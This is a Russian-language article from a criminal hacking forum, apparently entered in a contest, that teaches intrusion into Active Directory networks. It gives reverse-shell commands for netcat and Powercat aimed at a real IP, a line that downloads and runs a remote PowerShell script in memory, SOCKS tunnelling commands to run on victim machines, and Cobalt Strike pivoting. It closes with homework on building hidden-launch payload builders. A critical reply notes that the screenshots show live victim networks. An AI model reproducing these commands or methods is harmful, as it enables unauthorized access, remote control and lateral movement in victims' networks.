• XSS.stack #1 – первый литературный журнал от юзеров форума

Статья Носки всегда бери с собой )))

AlexLyt

RAID-массив
Забанен
Регистрация
11.11.2019
Сообщения
89
Реакции
34
Пожалуйста, обратите внимание, что пользователь заблокирован
Привет всем

В последнее время, я много занимаюсь с ребятами, по атакам на АД. Показываю стек технологий, которые нужно знать и разбираться. После освоения теории и получения базовой практики, ребята сами должны определиться в направлении, в котором они хотят продвигаться дальше и зарабатывать.
Решил одну из тем, которую мы изучаем, оформить и разместить для участия в конкурсе. Как и в обучении, постараюсь изложить материал последовательно. Материал полностью мой, авторский, поэтому Хейтеров прошу негатив писать только с ссылкой на их материал))))). Так же хочу пояснить, что именно такого материала и в таком изложении я не видел. И как в учебе, будет интересно и понятно все в самом конце, так уж образование устроено).
Тема, которую я хочу раскрыть, будет актуальна в основном для начинающих и среднего уровня ребятам. А для продвинутых, данный материал – будет как повторение или как напоминание )))).

И так, очень актуальной темой при работе с сетками – является организация разного рода соединений, коммуникации и доставки софта, в том числе и полезной нагрузки. Желательно ручками проделать это от самого начала и до конца, что б понимать на каком этапе идет сбой, почему не возвращается сессия (коннект). Весь инструментарий, который я даю в данной статье, можно самому изменить, подправить, так как он есть в открытом доступе.

И так приступим, общая тема – Носки всегда бери с собой ))):
  • Вступление (теория);
  • NC (Начало);
  • Socks (Продвинутый NC);
  • Cobalt Strike (профит) )));
  • Выводы;
  • Д.З.
Приступим.

0.
В нашем не легком деле, очень важно быстро организовать доступ, поднять сессию, залить инструмент, с которым мы будем работать в дальнейшем. Когда мы уже взрослые, понимаем что к чему, тогда мы обычно используем Лоадер для доставки. В этой статье мы попробуем пройти начало, попробуем разобраться как работать используя базовый софт, не прибегая к криптору и прочим спец средствам. Ведь часто бывает так, что и у бывалых появляется потребность в организации доступов, без специальных средств. И так теория –
Мы имеем удаленную машину(цель). И нам надо организовать коммуникацию с этой машиной - это во первых, а во вторых так же организовать коммуникацию с сетью жертвы (как пример Актив Директори) где находится эта машина. И так, нам нужно организовать клиент – серверное решение. В зависимости от того где находится цель, а именно это статический IP или за NAT, мы определимся кто у нас сервер, а кто клиент и наше соединение будет либо:

BIND, когда цель имеет статический IP ;
либо
REVERS, когда цель находится за NAT.

Далее, что нам нужно знать о клиент – серверном взаимодействии на начальном уровне, это то, что:
Серверная часть в зависимости от инструмента может называется – Сервер, Хандлер, Листенер.
А клиентская сторона – Клиент, Пейлоад, Полезная нагрузка, Стежер, Стежелист.

В зависимости от условий, мы сами принимает решение, что, как, почему и какой порт использовать в той или иной ситуации и так далее. Теперь мы рассмотрим эволюцию взаимодействия, от простого к более продвинутому уровню.

1.
NC, Powercat

Самые первые и базовые инструмента, которые должен начать использовать любой Атакующий, NC, Powercat. Легко доставляется, легко обходится АВ, дает нам доступ к cmd.exe к, методам доставки и реллею. В данном случае для взаимодействия с жертвой достаточно 2 машины, одна из которых должна иметь статический ИП.

Так вот в зависимости от того, какой ИП жертва имеет, мы принимаем решение какое соединение использовать. Главное понимать, что почти всегда используется REVERS и основная задача понять кто здесь клиент, а кто сервер. Далее рассмотрим наиболее необходимые команды для своей шпаргалки или назовем это методичкой, чеклистом.

NC:

В статье я рассматриваю NC для Windows платформы, хотя принципиально ничем не отличается от версии Unix. NC – утилита позволяющая устанавливать соединения TCP и UDP, принимать данные и передавать их. Главное что нам нужно понимать, что основных участника 2 – клиент и сервер. Сервер мы запускаем на WPS(на том, что имеет статический IP). Клиент запускаем на жертве. К VPS мы подключаемся через то т же RDP и работаем с командной строкой.
Думаю на описании утилиты нет смысла заострять внимание, переходим к практике.

Запуск nc для ожидания что к нам вернется командная строка запускаем на своем VPS( то есть на статическом IP).
- nc.exe -lp 80
Запуск nc для подключения и передачи командной строки. Запускаем на атакованной машине. (запускается на машине за NAT)
- nc.exe -e cmd 188.227.85.248 80

Ждем возврат CMD и работаем. Не забываем, подправить сам исполняемый файл - exe, если мы хотим запуститься в скрытом режиме, либо сделать bat, .vb, .js и прямо указать - запуск NC с в скрытном режиме. Более детальные возможности можно почерпнуть из документации разработчика.


Powercat:


Аналог NC – это Powercat, большого отличия мот предыдущего инструмента нет, но он нам тоже может быть даже очень интересным, поэтому так же быстро его рассмотрим. Powercat в отличии от предыдущего инструмента, является .ps1 скриптом, который легко модифицируется на лету, встраивается в другие скрипты, так же его можно совмещать при работе с тем же NC.
Принцип управления не отличается от предыдущего инструмента.
Запускаем Powercat для ожидания что к нам вернется командная строка. Запускаем на VPS и ждем сессию
Powershell.exe –ep bypass -nop -w hidden powercat -l -p 443

Запуск Powecat для подключения и передачи командной строки в срытом режиме. Запускаем с атакуемой машины.
Powershell.exe –ep bypass -nop -w hidden powercat -c 10.1.1.1 -p 443 -e cmd

Чем хорош именно этот инструмент, так это то, что мы можем его прямо без файлов загрузить в память, с того же GIT:
IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1')

И далее продолжаем работать как обычно. Вот самые простые способы и подручные методы для проброса сессии, которыми новички пользуются когда нет инструмента, а опытные, когда инструмент есть, а защита не дает ничего пробросить кроме самого простого)))))

Пример установления Revers сессии:

photo_2021-06-22_23-24-21.jpgphoto_2021-06-22_23-24-30.jpgphoto_2021-06-22_23-24-39.jpg

Эти инструменты нам нужны были, для понимания следующего раздела


2.

И так, здесь посмотрим более продвинутые методы и способы проброса сессии – Socks

SOCKS – это интернет-протокол, который используется для передачи пакетов с данными от сервера к клиенту с помощью промежуточного прокси-сервера.
На сегодняшний день рабочие 2 технологии Socks:

Socks4 – технология клиент – серверного приложения которое не защищено доступом, и любой может им воспользоваться.
Socks5 - технология клиент – серверного приложения к которое как минимум для подключения нужены учетные данные.

В данном случае между атакующим и жертвой стоит то т же самый WPS. На Клиенте (нашей жертве) мы запускаем клиентский .exe где указываем IP нашего WPS с указанием порта для переноса, а на нашем WPS запускаем серверный exe, этим мы создали связь между нашим WPS и Жертвой. Теперь, через наш WPS, мы будем попадать в сеть.
А следующий шаг – самый интересный, с помощью отдельной клиентской .exe (На мой взгляд, наилучший клиент для Socks, на сегодняшний день является Proxifier.) мы указываем во первых наш WPS как шлюз, IP и порт внутренней цели. И самое главное, что это может быть как сама жертва, так и принтер в сети. ))))
Пробежим по классическому инструменту - sSocks :

Сначала выполните на локальном компьютере, обычно на вашем собственном vps:
rcsocks -l 1080 -p 53 -v

Выполнить на целевой машине, добавить -b для работы в фоновом режиме в реальной ситуации проникновения
rssocks -s vps:ip:53 -v
Затем настройте прокси с помощью различных локальных инструментов прокси-сервера socks, socks5 192.168.1.100 1080
И вот, мы уже не только сессии можем пробросить, мы уже пускаем наш трафик через другую машину, сеть. При этом работая на своей машине )))) Вот мы и рассмотрели один из самых простых и отличных Носков.
Выбор носков за вами, среди популярных остаются следующие носки:
- sSocks;
- EarthWorm
- netch;
- gost;
- fatedier;

Отдельно для себя как альтернативу, можно использовать такой сервис как Ngroc, в этой статье, я его описывать не буду, оставлю только ссылки. На этом мы пока закончим, и перейдем к основному, с чего и можно было начинать )))), а именно Socks Cobalt Strike и получения профита ))).

3.

И так, с теорией как это работает мы разобрались. Мы уже можем сами ручками и подручным инструментом пробрасывать свои сессии и трафик. Пришло время показать, как работают наши знания целого стэка технологий. И на примере Cobalt Strike, получать наш профит. Иными словами мы имеем наш VPS с Cobalt Strike, наша машина с которой мы работаем в панели Cobalt Strike, и сессия к жертве.
Запускаем носки Cobalt Strike, в качестве клиента на нашей машине используем Proxifier, настраиваем все это:

мой ип:

мой ип.jpg


настраиваем клиент носков:

настраиваем клиент носков1.jpgнастраиваем клиент носков2.jpgнастраиваем клиент носков3.jpg

вот мы и в Испании )))

вот мы с испании.jpg


а вот мы взяли админа и лазим по сетке как у себя дома )))

а вот мы взяли админа и лазим по сетке как у себя дома )))1.jpgа вот мы взяли админа и лазим по сетке как у себя дома )))2.jpgа вот мы взяли админа и лазим по сетке как у себя дома )))3.jpg

Вот мы, уже и знаем как поднять сессию(вернуть ее), организовать проброс во внутреннюю сеть, и работать с чужой сетки. И так, зная все это, вы уже ХАКЕРЫ ))))) Как видите, нет ничего сложного, когда понимаешь, как это работает.

4.

А теперь в качестве последнего слова, будем подводить итог нашим знаниям. )))) В начале мы узнали как устроен и работает стек технологий, на примере Cobalt Strike я показал как весь трафик со своей машины перенаправить через захваченную машину.
Мы пополнили словарный запас используя целый стек технологий, кто только изучает тему ХАКинга, то вот следующий список для повторения который обязателен к пониманию для работы:
- Статический IP, NAT, WPS, RDP
- Сервер, Хандлер, Листенер;
- Клиент, Пейлоад, Полезная нагрузка, Стежер, Стежелист.
- NC, Powercat, Socks4, Socks5;
- Cobalt Strike )))
За последний год, я очень много работал с ребятами с Азии, и что я вам хочу сказать, что у всех абсолютно разные методы. Данный метод работы без лоадеров и крипторов в основном работают наши коллеги с Китая. Меняются только инструменты. )))) Ссылки на инструменты.
Приложения:
https://eternallybored.org/misc/netcat
ttps://github.com/besimorhino/powercat
Носки:
https://github.com/lparam/xSocks
htps://github.com/54Pany/sSocks
https://github.com/XHSecurity/EarthWorm
https://github.com/ginuerzh/gost
https://github.com/netchx/netch
https://github.com/fatedier
Сервисы:
https://ngrok.com/
https://www.ngrok.cc/

5.

В качестве практики, я своим ребятам даю задание по кодить, здесь не буду отходить от традиции и ради практики дам задание )
NC
-Сделать отдельно клиент и отдельно сервер;
-Сделать запуск клиента скрытым ;
- Написать билдер, который при получении IP и port выдавал NC-клиент, который двумя щелчками скрыто запускается.

Powercat
-Сделать отдельно клиент и отдельно сервер
- Сделать GUI сервера, с функциональностью прием сессии, загрузка выгрузка файла, работа с цмд;
- Сделать запуск клиента скрытым.
-Пересобрать в exe и dll.
Разбором этих заданий, займемся в слдущий раз).

И так ребят, на этом пока все.
Если тема зайдет и будет все понятно, а так же получит первое место, то можно будет разобрать все это в видео формате с рассмотрением сервисов с которыми можно работать и зарабатывать, в том числе и сервисом нашего СПОНСОРА ))))))

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++

 

Вложения

  • настраиваем клиент носков1.jpg
    настраиваем клиент носков1.jpg
    92.9 КБ · Просмотры: 153
  • настраиваем клиент носков2.jpg
    настраиваем клиент носков2.jpg
    113.8 КБ · Просмотры: 113
  • настраиваем клиент носков3.jpg
    настраиваем клиент носков3.jpg
    42.2 КБ · Просмотры: 133
Выскажу свое мнение.

Статья пойдет для новичков, которым надо не вникать в детали, а брать и делать.

Для конкурса не подходит.

Поставил бы лайк, если бы в статье были только технические подробности, без громких заявлений.

В последнее время, я много занимаюсь с ребятами, по атакам на АД. Показываю стек технологий, которые нужно знать и разбираться. После освоения теории и получения базовой практики, ребята сами должны определиться в направлении, в котором они хотят продвигаться дальше и зарабатывать.
Тут два варианта. Либо ты врешь, чтобы набрать дутого авторитета. Либо, что еще хуже, ты не врешь, и реально с таким уровнем кого-то учишь. Если еще и денег за это берешь, то ты просто гений маркетинга.

Материал полностью мой, авторский, поэтому Хейтеров прошу негатив писать только с ссылкой на их материал)))))
Назвал критиков хейтерами, и такой в домике.

В зависимости от того где находится цель, а именно это статический IP или за NAT
Ты мешаешь три понятия:
1) статический или динамический адрес, т.е. настроен ли адрес жестко или выдается по DHCP с возможной ротацией
2) локальный или глобальный адрес (серый/белый)
3) транслируется адрес или нет при помощи NAT
Адрес может быть динамическим и при этом глобальным, он может быть глобальным и при этом натироваться в другой глобальный, возможно много разных безумных вариантов, чем и интересны, кстати, сети.

Ты не читал RFC. Ты не разбираешься в сетевых технологиях на достаточном уровне. Ты имеешь ограниченный опыт. Именно поэтому ты так легко смешиваешь эти различные понятия.
Именно поэтому твою статью воспринимают скептически.

SOCKS – это интернет-протокол, который используется для передачи пакетов с данными от сервера к клиенту с помощью промежуточного прокси-сервера.
Ну надо же какое совпадение, ровно в таких же терминах SOCKS описывается на англоязычной википедии:
SOCKS is an Internet protocol that exchanges network packets between a client and server through a proxy server.
Только это определение не описывает сути SOCKS.

Поднять TCP/UDP прокси можно и без SOCKS. Создаем два TCP соединения или UDP потока и копируем данные туда-сюда. Очевидно, что при смене адреса назначения придется пересоздавать соединения вручную.

SOCKS – это возможность клиента стандартизированным образом потребовать от прокси соединения к выбранному хосту по адресу или имени.

Так как ты не владеешь знаниями сетевых технологий на должном уровне, ты не в состоянии выделить суть технологии, ее новизну и отличие от других технологий. Ты цитируешь википедию.

Мы пополнили словарный запас
А хотелось бы по прочтении статьи пополнить запас знаний, навыков и умений.

За последний год, я очень много работал с ребятами с Азии, и что я вам хочу сказать, что у всех абсолютно разные методы. Данный метод работы без лоадеров и крипторов в основном работают наши коллеги с Китая.
Ты опять пытаешься выставить себя авторитетом, на этот раз консультантом международного уровня, и в этот раз я тебе верю еще меньше.

Если тема зайдет и будет все понятно, а так же получит первое место
Очень наивная попытка шантажа. Так ведет себя человек незрелый, не способный посмотреть на себя со стороны. Лично я считаю, что преподавать такие личности не должны, от них больше вреда, чем пользы.

Фото которое выложил - живые сетки которые сей час в отработке.
То есть ты, ничтоже сумняшеся, просто взял и выложил список атакуемых сетей на радость аверам? Если в технологиях ты соображаешь хотя бы кое-что, то в работе, взаимодействии с другими людьми, элементарной безопасности, ты не понимаешь вообще ничего.

Такое мое мнение.
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Привет всем, не могу сюда норм попасть, чет не прогружается норм сайт у мя.
Еще раз кто поддержал спасибо)))
Многие вопросы по задавали, постараюсь сюда или фото или видео залить, что б наглядно показать ответы на ваши вопросы.
Хочется все что я написал завернуть в 3 минуты видео.
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх